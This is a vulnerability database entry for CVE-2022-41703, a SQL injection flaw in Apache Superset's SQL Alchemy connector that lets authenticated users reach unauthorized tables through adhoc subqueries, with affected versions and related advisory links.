Lucene search
ApacheCVELIST:CVE-2022-41703HistoryJan 16, 2023 - 10:14 a.m.
CVE-2022-41703 Apache Superset: SQL injection vulnerability in adhoc clauses
2023-01-1610:14:01
apache
www.cve.org
8
apache superset
sql alchemy connector
sql injection
A vulnerability in the SQL Alchemy connector of Apache Superset allows an authenticated user with read access to a specific database to add subqueries to the WHERE and HAVING fields referencing tables on the same database that the user should not have access to, despite the user having the feature flag “ALLOW_ADHOC_SUBQUERY” disabled (default value). This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.
CNA Affected
[
{
"defaultStatus": "unaffected",
"product": "Apache Superset",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.0.1",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
},
{
"lessThanOrEqual": "1.5.2",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
]Related
github
github
Apache Superset's SQL Alchemy connector vulnerable to SQL Injection
2023-01-16 12:30:18
veracode
veracode
Information Disclosure
2023-01-18 02:05:08
osv
osv
CVE-2022-41703
2023-01-16 11:15:10
Apache Superset's SQL Alchemy connector vulnerable to SQL Injection
2023-01-16 12:30:18
cve
cve
CVE-2022-41703
2023-01-16 11:15:10
prion
prion
Design/Logic Flaw
2023-01-16 11:15:00
nvd
nvd
CVE-2022-41703
2023-01-16 11:15:10